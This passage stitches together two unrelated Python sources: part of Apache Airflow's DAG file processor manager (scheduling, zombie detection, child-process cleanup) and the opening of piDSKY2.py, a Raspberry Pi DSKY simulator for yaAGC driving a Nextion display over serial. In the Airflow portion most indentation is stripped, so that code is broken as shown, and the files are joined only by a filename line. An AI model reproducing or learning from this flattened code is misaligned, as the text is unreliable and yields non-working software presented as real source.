        Send an agent heartbeat signal to the manager, requesting that it run one
        processing "loop".
        Call wait_until_finished to ensure that any launched processors have
        finished before continuing.
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
            # If this died because of an error, it will be noticed and restarted
            # when harvest_simple_dags calls _heartbeat_manager.
pass
def wait_until_finished(self):
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__CORE__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing result in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._file_paths = stat.file_paths
self._done = stat.done
self._all_files_processed = stat.all_files_processed
@property
def file_paths(self):
return self._file_paths
@property
def done(self):
return self._done
@property
def all_files_processed(self):
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
    in parallel to process them and puts the results into a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: airflow.models.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode=True):
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.error("Cannot use more than 1 thread when using sqlite. "
"Setting parallelism to 1")
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
        # How many seconds we wait for tasks to heartbeat before marking them as zombies.
self._zombie_threshold_secs = (
conf.getint('scheduler', 'scheduler_zombie_task_threshold'))
# Map from file path to the processor
self._processors = {}
self._heartbeat_count = 0
# Map from file path to stats about the file
self._file_stats = {} # type: dict(str, DagFileStat)
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.utcnow()
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
self._zombies = []
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
poll_time = None # type: Optional[float]
if self._async_mode:
poll_time = 0.0
self.log.debug("Starting DagFileProcessorManager in async mode")
else:
poll_time = None
self.log.debug("Starting DagFileProcessorManager in sync mode")
# Used to track how long it takes us to get once around every file in the DAG folder.
self._parsing_start_time = timezone.utcnow()
while True:
loop_start_time = time.time()
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Recived %s singal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
                    # are told to (as that would open another connection to the
                    # SQLite DB, which isn't a good practice).
continue
self._refresh_dag_dir()
self._find_zombies()
simple_dags = self.heartbeat()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
Refresh file paths from dag dir if we haven't done it for too long.
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
if STORE_SERIALIZED_DAGS:
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.dag import DagModel
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if ((timezone.utcnow() - self.last_stat_print_time).total_seconds() > self.print_stats_interval):
if len(self._file_paths) > 0:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"# DAGs",
"# Errors",
"Last Runtime",
"Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((now - processor_start_time).total_seconds() if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge('dag_processing.last_run.seconds_ago.{}'.format(file_name), seconds_ago)
if runtime:
Stats.timing('dag_processing.last_duration.{}'.format(file_name), runtime)
# TODO: Remove before Airflow 2.0
Stats.timing('dag_processing.last_runtime.{}'.format(file_name), runtime)
rows.append((file_path,
processor_pid,
runtime,
num_dags,
num_errors,
last_runtime,
last_run))
        # Sort by longest last runtime. (Can't sort None values in python3)
        rows = sorted(rows, key=lambda x: x[5] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime) if runtime else None,
num_dags,
num_errors,
"{:.2f}s".format(last_runtime) if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None
))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
@property
def file_paths(self):
return self._file_paths
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self._kill_timed_out_processors()
finished_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
running_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
Stats.decr('dag_processing.processes')
now = timezone.utcnow()
finished_processors[file_path] = processor
stat = DagFileStat(
len(processor.result[0]) if processor.result is not None else 0,
processor.result[1] if processor.result is not None else -1,
now,
(now - processor.start_time).total_seconds(),
self.get_run_count(file_path) + 1,
)
self._file_stats[file_path] = stat
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.warning(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result[0]:
simple_dags.append(simple_dag)
return simple_dags
def heartbeat(self):
"""
This should be periodically called by the manager loop. This method will
kick off new processes to process DAG definition files and read the
results from the finished processors.
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if len(self._file_path_queue) == 0:
self.emit_metrics()
self._parsing_start_time = timezone.utcnow()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, stat in self._file_stats.items()
if stat.run_count == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(0, 0, None, None, 0)
self._file_path_queue.extend(files_paths_to_queue)
# Start more processors if we have enough slots and files to process
while (self._parallelism - len(self._processors) > 0 and
len(self._file_path_queue) > 0):
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path, self._zombies)
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
# Update heartbeat count.
self._heartbeat_count += 1
return simple_dags
@provide_session
def _find_zombies(self, session):
"""
Find zombie task instances, which are tasks that haven't heartbeated for too long,
and update the current zombie list.
"""
now = timezone.utcnow()
zombies = []
if not self._last_zombie_query_time or \
(now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval:
# to avoid circular imports
from airflow.jobs import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
limit_dttm = timezone.utcnow() - timedelta(
seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
tis = (
session.query(TI)
.join(LJ, TI.job_id == LJ.id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
).all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti in tis:
sti = SimpleTaskInstance(ti)
self.log.info(
"Detected zombie job with dag_id %s, task_id %s, and execution date %s",
sti.dag_id, sti.task_id, sti.execution_date.isoformat())
zombies.append(sti)
self._zombies = zombies
def _kill_timed_out_processors(self):
"""
Kill any file processors that have timed out, to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.info(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
processor.file_path, processor.pid, processor.start_time.isoformat())
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._heartbeat_count < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them orphaned.
"""
pids_to_kill = self.get_all_pids()
if len(pids_to_kill) > 0:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if len(child_processes) > 0:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
def emit_metrics(self):
"""
Emit metrics about the DAG parsing summary.
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = (timezone.utcnow() - self._parsing_start_time).total_seconds()
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge('dag_processing.import_errors',
sum(stat.import_errors for stat in self._file_stats.values()))
# TODO: Remove before Airflow 2.0
Stats.gauge('collect_dags', parse_time)
Stats.gauge('dagbag_import_errors', sum(stat.import_errors for stat in self._file_stats.values()))
piDSKY2.py
#!/usr/bin/python3
# Copyright 2017 Ronald S. Burkey
#
# This file is part of yaAGC.
#
# yaAGC is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# yaAGC is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with yaAGC; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Filename: piDSKY2.py
# Purpose: This is a variation of piDSKY.py (a "generic" DSKY
# simulation for use with yaAGC) that is targeted for
# a Raspberry Pi using a specific hardware model, and
# is not really applicable for any other purpose.
# Reference: http://www.ibiblio.org/apollo/developer.html
# Mod history: 2021-02-17 Added functionality for driving a
# Nextion 4.3" display and custom alarm panel board.
# 2017-11-19 RSB Began adapting from piDSKY.py.
# 2017-11-20 RSB Added command-line arguments of various
# kinds and fixed the keyboard binding
# in the tkinter window. Systematized
# the widget positioning to just a few
# variables rather than hardcoding them
# lots of places.
# 2017-11-21 RSB Changed PRO timeout from 0.25 to 0.5.
# 2017-11-22 RSB Graphical rendering of widgets now made
# lazy, so that they're not drawn at all
# if they haven't changed.
# 2017-11-24 RSB Added suggested stuff for numeric keypad.
# 2017-11-25 RSB Added indicator-lamp controls based on
# the external program 'led-panel', and
# duplicated (I hope) Mike Stewart's fixes
# to yaDSKY2 a year or so ago, for the
# RESTART, STANDBY, OPR ERR, and KEY REL
# lamps. For the STANDBY behavior to
# work properly, also changed the PRO
# timeout to 0.75. (Needed to be in the
# range 0.64 to 1.92.)
# 2017-11-26 RSB Added timing filters to prevent the led-panel
# from being run when it is already running.
# My dummy version of led-panel has been
# modified (to test this feature) to always
# take around a second to run, and to include
# a high-resolution time in its display message.
# Fixed dumb bugs in TEMP, VEL, and UPLINK lamps.
# Now expects key-repeat to be off, and detects
# release of the PRO key directly.
# 2017-11-27 RSB At Sam's request, emptied out the default
# command-string for led-panel (to eliminate,
# apparently, the backlights for the keypad).
# Added vncserverui detection. Swapped the
# BackSpace and Tab aliases (now for PRO and
# KEY REL), so as to be able to implement a
# key-release for the PRO alias. The
# RRRRR exit had ceased working and, as far
# as I can tell, should never have worked in
# the first place.
# 2017-11-28 RSB Replaced the single-character global buffers
# I was using for buffering GUI keypresses
# and releases with a proper queue that insures
# no presses or releases are lost and that they
# are all processed in the correct order.
# Added some instrumentation that keeps a count
# of all uses of V35E and prints them out on
# stderr. Added code to catch exceptions in use
# of psutil (that I think can happen when trying
# to get the attributes of a process which has
# just disappeared).
# 2017-11-29 RSB Initial attempt at coding up a PIGPIO-based
# solution for running the indicator lamps,
# vs using the external program 'led-panel'.
# The logic is "complete", but I don't have any
# of the technical documentation for the LED
# board and don't recall the part number of the
# driver chip :-), so it's pretty much guaranteed
# not to work as-is. Nevertheless, stuff like
# the SPI API can be checked out to a certain
# degree.
# 2017-12-04 RSB Fixed PIGPIO control of lamps, I think.
# 2017-12-06 RSB Added 3 dots.
# 2017-12-09 RSB Added --record and --playback. Cleaned up
# the record-keeping about the last values of
# the input channels a lot, so that a lot of
# unnecessary duplication of operations is
# presumably prevented.
# 2017-12-11 RSB Now accepts floats as timestamps in playback
# files, though hopefully that will never occur.
# 2017-12-12 RSB Added AGC input channels (i.e., keystrokes) to
# the --record and --playback features. What I
# intend to do with them in playback is to flash
# the backlight on the associated keys momentarily,
# but I don't have enough technical information to
# do so, nor is it wired up on the DSKY I have yet,
# so at the moment it does nothing in playback other
# than hook it.
# 2017-12-13 RSB Added the key-backlight on playback feature I
# simply hooked yesterday. There was a bug in
# keeping track of which lamps had changed, that
# became apparent only when adding an 8th digit
# for the LED controller.
# 2017-12-16 RSB Now allow AGC-connect operation to timeout
# (currently 10 seconds). Useful for connection
# to yaAGC external to Pi.
# 2017-12-20 RSB Added --lamptest.
# 2017-12-21 RSB Added --manual.
# 2017-12-27 RSB The SPI handle wasn't getting released under
# some circumstances when the program exited,
# causing re-runs to eventually fail when no
# more SPI handles were available in PIGPIOD.
# I hope I tracked all those down and fixed them.
# 2017-12-28 RSB Added a little extra (probably unnecessary) code
# to insure shutdown of PIGPIO on termination.
# Tests of yesterday's SPI-shutdown code have been
# working fine, though.
# 2017-12-30 RSB Allowed corrupted lines in playback scripts,
# in order to handle comment lines.
# 2017-12-31 RSB Modified the playback scripts in two ways: First,
# it explicitly checks for '#...' and removes them
# as being comments, and doesn't simply rely on
# the line being ill-formed. Secondly, after
# removal of comments, any line NOT of the form
# "float octal octal" is treated as "float command",
# where the command is executed in the background
# by shelling out. Thus, arbitrary BASH commands such
# as audio playback can be put into the script.
# 2018-01-06 MAS Switched the TEMP light to use channel 163 instead
# of channel 11.
# 2018-03-10 RSB Added --gunmetal option.
#
# About the design of this program ... yes, a real Python developer would
# objectify it and have lots and lots of individual modules defining the objects.
# However, I'm not a real Python developer, and this is simply one stand-alone
# file comprising all of the functionality. In other words, I don't see that
# any of this code is particularly reusable, so I haven't bothered to attempt to
# encapsulate it into reusable modules.
#
# In this hardware model:
#
# 1. yaAGC and piDSKY2.py are running on a Raspberry Pi, using the
# Raspbian operating system.
# 2. There is a physical model of a DSKY, accessible via the Pi's GPIO.
# 3. The physical DSKY's keyboard is accessed as a normal keyboard (as
# far as Raspbian is concerned) that provides the usual keycodes
# (0 1 2 3 4 5 6 7 8 9 + - V N C P K R Enter) when the physical DSKY's
# buttons are pressed. Additionally, there are some keycode aliases
# for the keycodes just mentioned, which can be used if alternate physical
# keypads are used.
# 4. The DSKY's discrete indicator lamps (i.e., the upper left section
# of the DSKY's front panel) are accessed either by shelling out to the
# 'led-panel' program for each interaction, or else by using the PIGPIO
# module to directly control the Pi's SPI bus on the GPIO. The former
# is by default, and the latter is done if there is a command-line
# parameter --pigpio=N (where N is a brightness level from 0 to 15).
# 5. The DSKY's upper right portion of the front panel (i.e., the
# numeric registers, COMP ACTY indicator, etc.) consists of an LCD
# panel attached to the Pi via HDMI, composite video, or some other
# means. I.e., it is the display which Raspbian uses for its GUI
# desktop. It is accessed using the tkinter module.
#
# One-time setups needed:
#
# sudo apt-get install python3-tk python3-pip imagemagick \
# python-imaging python-imaging-tk python3-psutil xterm
# sudo pip3 install pyscreenshot pillow
#
# For using the --pigpio feature (on a Pi), the following setups are also needed:
#
# sudo apt-get install pigpio python3-pigpio
#
# Moreover, hardware SPI is not enabled in raspbian by default, so for --pigpio on a Pi:
#
# sudo raspi-config
#
# and then use the Interfacing / SPI option to enable the hardware SPI device.
#
# On a Pi, the entire software stack, including yaAGC, is probably best run by
# using the script
#
# xterm [-fullscreen] -e runPiDSKY2.sh [OPTIONS]
#
# In terms of the software model, you basically have two threads, the tkinter module's
# "root" thread (which is used for drawing the graphics mentioned in item #5 on the
# list above, either full-screen or in a 272x480 window), and the "eventLoop" thread,
# which handles all communication with yaAGC, receives keyboard inputs, and performs
# all non-graphical processing, but decides which graphical widgets are supposed to
# be drawn. All of the other code is just callbacks or auxiliary functions used by the
# eventLoop thread. Additionally, Raspbian's RAM disk (/run/user/$UID/) is used for all files
# created by the program, including any temporary files.
import time
import os
import signal
import sys
import argparse
import threading
from tkinter import Tk, Label, PhotoImage
import termios
import fcntl
from pyscreenshot import grab
import psutil
import socket
import serial
#####################################################################################################################################################
# Setup the serial communication (Vlad Mihailescu)
ser_alarm=serial.Serial('/dev/ttySC0', baudrate=9600, timeout=1) # Alarm Panel
ser_disp=serial.Serial('/dev/ttySC1', baudrate=9600, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=1) # Display
eof = b'\xff\xff\xff'
turnOFF = b'33808'
turnON = b'24544'
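# Note on the framing used above and below (summary inferred from the writes in
# initDisplay() and displayGraphic()): each Nextion instruction is a plain ASCII
# command terminated by the three-byte sequence 0xFF 0xFF 0xFF (the 'eof' constant).
# The turnOFF/turnON constants appear to be 16-bit RGB565 color values written to the
# .bco (background color) and .pco (pen/foreground color) attributes of HMI objects,
# e.g. (illustrative):
#   ser_disp.write(b'l2.pco=' + turnON + eof)   # light the second separator line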
# Initialize Nextion 4.3" HMI (Vlad Mihailescu)
def initDisplay():
time.sleep(2)
#ser_disp.write(b'page1' + eof)
ser_disp.write(b'cal.bco=' + turnOFF + eof)
#ser_disp.write(b'pl.bco=' + turnOFF + eof)
#ser_disp.write(b'vl.bco=' + turnOFF + eof)
#ser_disp.write(b'nl.bco=' + turnOFF + eof)
ser_disp.write(b'p0.txt=""' + eof)
ser_disp.write(b'p1.txt=""' + eof)
ser_disp.write(b'v0.txt=""' + eof)
ser_disp.write(b'v1.txt=""' + eof)
ser_disp.write(b'n0.txt=""' + eof)
ser_disp.write(b'n1.txt=""' + eof)
ser_disp.write(b'l1.pco=23243' + eof)
ser_disp.write(b'l2.pco=' + turnOFF + eof)
ser_disp.write(b'l3.pco=' + turnOFF + eof)
ser_disp.write(b'r10.txt=""' + eof)
ser_disp.write(b'r11.txt=""' + eof)
